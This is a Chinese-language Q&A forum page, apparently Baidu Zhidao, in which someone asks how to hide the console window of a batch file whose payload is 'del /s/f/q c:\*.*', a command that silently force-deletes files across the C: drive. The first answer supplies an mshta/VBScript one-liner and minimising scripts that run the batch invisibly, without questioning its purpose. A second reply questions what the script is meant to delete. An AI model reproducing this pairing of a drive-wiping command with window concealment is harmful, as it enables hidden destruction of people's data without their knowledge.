.BAT文件运行时,有什么办法将窗口隐藏?
列:@echooffdel/s/f/qc:\*.*exit保存为.BAT,运行时,有什么办法可以将其窗口隐藏?...
列:
@echo off
del /s/f/q c:\*.*
exit
保存为.BAT,运行时,有什么办法可以将其窗口隐藏? 展开
@echo off
del /s/f/q c:\*.*
exit
保存为.BAT,运行时,有什么办法可以将其窗口隐藏? 展开
2个回答
2014-02-21
展开全部
利用vbs后台运行就ok了
在批处理前面加上
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)
就可以在后台运行,不会显示黑窗口
::最小化运行批处理
@echo off&&mode con cols=15 lines=1
%1 %2
start /min /i "" "%~nx0" goto min&&goto :eof
:min
echo xxx
pause>nul
exit
@echo off
mode con cols=15 lines=1
if exist "Temp.bat" goto Start
>Temp.bat echo start/min "" "%~nx0"^&exit
start/min Temp.bat&exit
:Start
del "Temp.bat">nul
pause
在批处理前面加上
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)
就可以在后台运行,不会显示黑窗口
::最小化运行批处理
@echo off&&mode con cols=15 lines=1
%1 %2
start /min /i "" "%~nx0" goto min&&goto :eof
:min
echo xxx
pause>nul
exit
@echo off
mode con cols=15 lines=1
if exist "Temp.bat" goto Start
>Temp.bat echo start/min "" "%~nx0"^&exit
start/min Temp.bat&exit
:Start
del "Temp.bat">nul
pause
2014-02-21
展开全部
晕~~~~你写的这个东西是删除不了什么东西的,你写个批处理文件是想删除什么啊?
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询